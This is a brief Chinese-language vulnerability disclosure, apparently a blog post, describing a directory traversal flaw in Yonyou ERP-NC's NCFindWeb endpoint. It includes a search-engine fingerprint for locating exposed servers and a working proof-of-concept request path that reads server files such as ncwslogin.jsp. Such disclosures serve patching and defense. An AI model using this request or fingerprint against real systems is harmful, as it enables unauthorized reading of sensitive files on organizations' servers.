Yonyou ERP-NC NCFindWeb 目录遍历漏洞
# Yonyou ERP-NC NCFindWeb 目录遍历漏洞
## 漏洞描述
YonyouERP-NC 存在目录遍历漏洞,攻击者可以通过目录遍历获取敏感文件信息
## 漏洞影响
YonyouERP-NC
## 网络测绘
app=...
Yonyou ERP-NC NCFindWeb 目录遍历漏洞
漏洞描述
YonyouERP-NC 存在目录遍历漏洞,攻击者可以通过目录遍历获取敏感文件信息
漏洞影响
YonyouERP-NC
网络测绘
app="Yonyou-UFIDA-NC"
漏洞复现
POC为
/NCFindWeb?service=IPreAlertConfigService&filename=
查看 ncwslogin.jsp 文件
- 发表于 2024-07-12 18:45:01
- 阅读 ( 2113 )
- 分类:OA产品
带头大哥
456 篇文章